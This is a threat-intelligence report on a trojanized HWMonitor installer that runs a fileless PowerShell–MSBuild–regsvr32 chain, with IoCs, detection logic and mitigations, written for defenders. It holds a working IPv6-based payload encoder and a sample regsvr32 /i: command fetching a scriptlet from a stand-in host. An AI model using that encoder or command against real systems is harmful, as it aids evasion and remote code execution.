Full Report
Overview
Recent reporting has identified a trojanized version of the CPUID HWMonitor installer being used to deliver a multi-stage, fileless malware chain that leverages trusted Windows binaries. Upon execution, the installer initiates a sequence involving PowerShell, MSBuild, and regsvr32, ultimately leading to the execution of malicious scriptlet files such as Clippy.sct and a secondary launcher scriptlet. These scriptlets utilize ActiveX (WScript.Shell) to silently invoke:
Analysis Summary
# Tool/Technique: Trojanized CPUID HWMonitor (Fileless .NET Delivery)
## Overview
This attack involves the distribution of a trojanized version of the legitimate CPUID HWMonitor installer. Its purpose is to deliver a multi-stage, fileless .NET malware chain. It leverages "Living off the Land" (LotL) binaries so that every process in the chain is a signed Microsoft image, which evades signature-based controls, and it executes the malicious code in memory via obfuscated scriptlets and system utilities.
## Technical Details
- **Type:** Malware delivery chain / Fileless Malware
- **Platform:** Windows
- **Capabilities:** Obfuscation (IPv6-themed), LotL execution, fileless payload delivery, credential/data harvesting.
- **First Seen:** Q3 2024 (approximate based on reporting)
## MITRE ATT&CK Mapping
- **TA0002 - Execution**
  - T1204.002 - User Execution: Malicious File (the trojanized installer)
  - T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information
  - T1218.010 - System Binary Proxy Execution: Regsvr32
  - T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild
  - T1620 - Reflective Code Loading
- **TA0003 - Persistence**
  - T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- **TA0011 - Command and Control**
  - T1105 - Ingress Tool Transfer (`regsvr32` fetching the remote `.sct`)

Note that T1218.010 and T1127.001 sit under Defense Evasion in current ATT&CK, not Execution; the proxy binaries are the evasion, PowerShell is the execution primitive.
## Functionality
### Core Capabilities
- **LotL Chain:** A `PowerShell` -> `MSBuild` -> `regsvr32` sequence orchestrates execution. Each stage is a signed Microsoft binary (`powershell.exe`, `MSBuild.exe`, `Regsvr32.exe`), so image-based allow lists and signature-based tools see only trusted code.
- **Fileless Execution:** The secondary stages are not dropped as conventional executables; they arrive as scriptlets (`.sct`) or are compiled and run in memory. The term is approximate: a scriptlet pulled by `regsvr32 /i:<URL>` is fetched through urlmon and typically lands in the user's INetCache directory, which is a useful forensic artifact.
### Advanced Features
- **IPv6 Obfuscation:** The loader encodes payload data as a list of syntactically valid but meaningless IPv6 addresses, so string and entropy heuristics see what looks like network configuration rather than a blob; the loader reassembles the bytes at runtime.
- **ActiveX Integration:** The scriptlets execute under `scrobj.dll` inside `regsvr32` and instantiate `WScript.Shell` to silently launch system commands and secondary scriptlets such as `Clippy.sct`.
- **In-Memory .NET Loading:** The final payload is typically a .NET assembly loaded reflectively into memory rather than written to disk.
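The IPv6 trick is easier to reason about with a working encoder and decoder. The block below is an added example, not code from the reporting and not the loader's real encoder: the framing (a 4-byte little-endian length prefix, zero padding to 16-byte chunks, one uncompressed address per chunk), the `SAMPLE_PAYLOAD` bytes and the `SAMPLE_SCRIPTLET` text are all constructed for illustration. It also shows the triage side: pulling every full-form IPv6 literal out of a script body and attempting to decode it, which is what a YARA hit on "many IPv6 strings next to `WScript.Shell`" leads an analyst to do next.

```python
import ipaddress
import re
import struct

# Constructed sample payload: an MZ-prefixed placeholder standing in for the
# .NET assembly a real loader would carry. Not real malware.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"constructed placeholder bytes, not a real assembly " * 3

# Full-form IPv6 literal: eight hextets, no "::" compression. Encoded blobs
# come out in this shape; genuine configuration rarely has long runs of it.
RX_IPV6_FULL = re.compile(r"\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b")


def encode_as_ipv6(data: bytes) -> list[str]:
    """Hide bytes in a list of syntactically valid IPv6 addresses.

    Assumed framing (the report does not give the real loader's layout):
    4-byte little-endian length prefix, then the payload, zero-padded to a
    multiple of 16 bytes. Each 16-byte chunk becomes one eight-hextet address.
    """
    framed = struct.pack("<I", len(data)) + data
    framed += b"\x00" * (-len(framed) % 16)
    return [
        ":".join(framed[i + j:i + j + 2].hex() for j in range(0, 16, 2))
        for i in range(0, len(framed), 16)
    ]


def decode_ipv6_list(addrs) -> bytes:
    """Reverse of encode_as_ipv6. IPv6Address.packed also accepts compressed forms."""
    raw = b"".join(ipaddress.IPv6Address(a).packed for a in addrs)
    if len(raw) < 4:
        raise ValueError("too short to carry a length prefix")
    (length,) = struct.unpack("<I", raw[:4])
    if length > len(raw) - 4:
        raise ValueError("length prefix exceeds decoded data")
    return raw[4:4 + length]


def carve_payload_from_script(text: str, min_addrs: int = 4):
    """Triage helper: collect every full-form IPv6 literal from a scriptlet or
    PowerShell source, in order, and try to decode them as a framed blob.
    Returns the payload bytes, or None when the text does not look encoded."""
    addrs = RX_IPV6_FULL.findall(text)
    if len(addrs) < min_addrs:
        return None
    try:
        return decode_ipv6_list(addrs)
    except ValueError:  # AddressValueError is a ValueError subclass
        return None


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on a carved blob: DOS header magic."""
    return data[:2] == b"MZ"


# Constructed scriptlet body in the shape the report describes: a WScript.Shell
# instantiation next to a large array of fake IPv6 addresses.
SAMPLE_SCRIPTLET = (
    '<scriptlet><script language="JScript"><![CDATA[\n'
    'var sh = new ActiveXObject("WScript.Shell");\n'
    "var hosts = [" + ", ".join(f'"{a}"' for a in encode_as_ipv6(SAMPLE_PAYLOAD)) + "];\n"
    "]]></script></scriptlet>"
)

if __name__ == "__main__":
    carved = carve_payload_from_script(SAMPLE_SCRIPTLET)
    n = len(RX_IPV6_FULL.findall(SAMPLE_SCRIPTLET))
    print(f"{n} addresses -> {len(carved)} bytes, MZ header: {looks_like_pe(carved)}")
```

The decoder deliberately goes through `ipaddress.IPv6Address(...).packed` rather than splitting on colons: it rejects anything that is not a real address (so false hits on stray hex are dropped) and handles `::`-compressed forms, which an actor could switch to without changing the scheme.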
## Indicators of Compromise
- **File Names:**
- `hwmonitor_1.52.exe` (Trojanized installer)
- `Clippy.sct`
- `launcher.sct`
- **Registry Keys:**
- `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (Modified to point to malicious scriptlets or MSBuild commands)
- **Network Indicators:**
- `hxxp[://]example-c2-domain[.]com/Clippy.sct`
- `hxxp[://]103[.]27[.]109[.]152/path/to/payload`
- **Behavioral Indicators:**
- `Regsvr32.exe` fetching remote `.sct` files via URL (e.g., `regsvr32 /s /n /u /i:http://... scrobj.dll`).
- `MSBuild.exe` executing XML project files from user-writable directories (e.g., `C:\Users\Public\`).
- Sudden PowerShell execution with large base64 encoded strings or IPv6-formatted arrays.
## Associated Threat Actors
- No public attribution at the time of reporting. The tradecraft (trojanized installer, LotL chain, custom or trial-license crypters) is consistent with financially motivated actors, though use by an APT group cannot be excluded.
## Detection Methods
- **Signature-based:** Match hashes of known trojanized CPUID HWMonitor installers, and verify that any HWMonitor installer carries a valid Authenticode signature from the vendor; a repackaged installer will be unsigned or signed by a different publisher.
- **Behavioral detection:**
- Alerting on `regsvr32.exe` making external network connections.
- Monitoring for parent-child process relationships: `PowerShell.exe` -> `MSBuild.exe` -> `Regsvr32.exe`.
- Detecting the loading of `scrobj.dll` by `regsvr32` with an `/i` flag containing a URL.
- **YARA:** Target patterns involving `WScript.Shell` calls inside `.sct` files and large arrays of hexadecimal strings formatted as IPv6 addresses.
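The behavioral indicators and detection methods above reduce to a few argument checks plus one lineage check. The block below is an added example, not detection content from the reporting or from any vendor product: `ProcEvent`, the regexes, the thresholds and the `SAMPLE_EVENTS` process tree (including the `c2.example` URL and the two benign look-alikes) are constructed for illustration. It runs the checks over the sample tree and returns the flagged pids and the `PowerShell -> MSBuild -> regsvr32` chain.

```python
import base64
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    """Subset of a process-creation record (Sysmon event 1 / EDR telemetry)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed encoded command: -EncodedCommand takes base64 of UTF-16LE text.
_ENC = base64.b64encode("Start-Process msbuild.exe".encode("utf-16le") * 6).decode()

# Constructed process tree in the shape the report describes, plus two benign
# look-alikes (vendor DLL registration, a Visual Studio build) to show that the
# checks key on arguments and lineage, not on image name alone.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Users\alice\Downloads\hwmonitor_1.52.exe", "hwmonitor_1.52.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -enc {_ENC}"),
    ProcEvent(400, 300, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\Public\build.xml"),
    ProcEvent(500, 400, r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /n /u /i:http://c2.example/Clippy.sct scrobj.dll"),
    ProcEvent(600, 100, r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\thing.dll"'),
    ProcEvent(700, 100, r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              "devenv.exe"),
    ProcEvent(800, 700, r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
              r"MSBuild.exe C:\src\proj\proj.csproj"),
]

RX_REMOTE_SCT = re.compile(r'(?i)[/-]i:\s*"?https?://')          # /i: or -i: with a URL
RX_SCROBJ = re.compile(r"(?i)\bscrobj\.dll\b")
RX_USER_WRITABLE = re.compile(r"(?i)\\(?:Users\\[^\\]+|ProgramData|Windows\\Temp)\\")
RX_ENCODED = re.compile(r"(?i)[-/]e(?:c|nc|ncodedcommand)?\s+[\"']?[A-Za-z0-9+/=]{100,}")
RX_IPV6 = re.compile(r"\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b")


def _name(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def triage_event(e: ProcEvent) -> list[str]:
    """Per-event argument checks matching the behavioral indicators."""
    n, c, reasons = _name(e.image), e.cmdline, []
    if n == "regsvr32.exe":
        if RX_REMOTE_SCT.search(c):
            reasons.append("regsvr32 /i: argument is a remote URL (Squiblydoo)")
        if RX_SCROBJ.search(c):
            reasons.append("regsvr32 loading scrobj.dll")
    elif n == "msbuild.exe":
        if RX_USER_WRITABLE.search(c):
            reasons.append("MSBuild project in a user-writable directory")
    elif n in ("powershell.exe", "pwsh.exe"):
        if RX_ENCODED.search(c):
            reasons.append("PowerShell with a large encoded command")
        if len(RX_IPV6.findall(c)) >= 8:
            reasons.append("PowerShell argument contains an IPv6-formatted array")
    return reasons


def triage(events) -> dict[int, list[str]]:
    """pid -> reasons, for events that tripped at least one check."""
    return {e.pid: r for e in events if (r := triage_event(e))}


def find_lotl_chains(events) -> list[list[int]]:
    """Lineage check: for every regsvr32, walk its ancestors and flag the
    PowerShell -> MSBuild -> regsvr32 ordering (intermediate hops allowed).
    Returns root-first pid chains."""
    by_pid = {e.pid: e for e in events}
    chains = []
    for e in events:
        if _name(e.image) != "regsvr32.exe":
            continue
        lineage, cur = [e], e
        while cur.ppid in by_pid and len(lineage) < 32:   # bound against pid-reuse cycles
            cur = by_pid[cur.ppid]
            lineage.append(cur)
        names = [_name(x.image) for x in lineage]          # child first
        if ("msbuild.exe" in names and "powershell.exe" in names
                and names.index("msbuild.exe") < names.index("powershell.exe")):
            chains.append([x.pid for x in reversed(lineage)])
    return chains


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
    print("chains:", find_lotl_chains(SAMPLE_EVENTS))
```

Two design points carry over to a real rule set. The lineage walk tolerates intermediate hops (a `cmd.exe` or `conhost.exe` between stages) rather than demanding an exact parent, which is how the chain usually looks in telemetry; and the MSBuild check looks at the project path in the command line, not the image path, because a Visual Studio build from a writable source tree is normal and a project under `C:\Users\Public` is not.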
## Mitigation Strategies
- **Prevention:** Use application control (AppLocker or Windows Defender Application Control) to restrict `MSBuild.exe` and `Regsvr32.exe`. Blocking `regsvr32.exe` for everyone breaks legitimate COM registration by installers, so prefer a rule that denies it to standard-user accounts; `MSBuild.exe` is on Microsoft's recommended WDAC block list and can be blocked outright on non-developer hosts.
- **Hardening:**
  - Disable or restrict Windows Script Host (WSH). Note the limit: the WSH `Enabled` setting governs `wscript.exe` and `cscript.exe`, while scriptlets run by `regsvr32` through `scrobj.dll` use the script engines directly, so this control does not stop Squiblydoo on its own.
  - Enable Attack Surface Reduction (ASR) rules, in particular "Block Office applications from creating child processes", "Block JavaScript or VBScript from launching downloaded executable content" and "Block execution of potentially obfuscated scripts".
  - Only download software from the official vendor website (cpuid.com) and verify its signature before running it.
## Related Tools/Techniques
- **Squiblydoo:** The technique of using `regsvr32` to execute remote COM scriptlets.
- **DotNetToJScript:** Often used in conjunction with these chains to load .NET assemblies from script environments.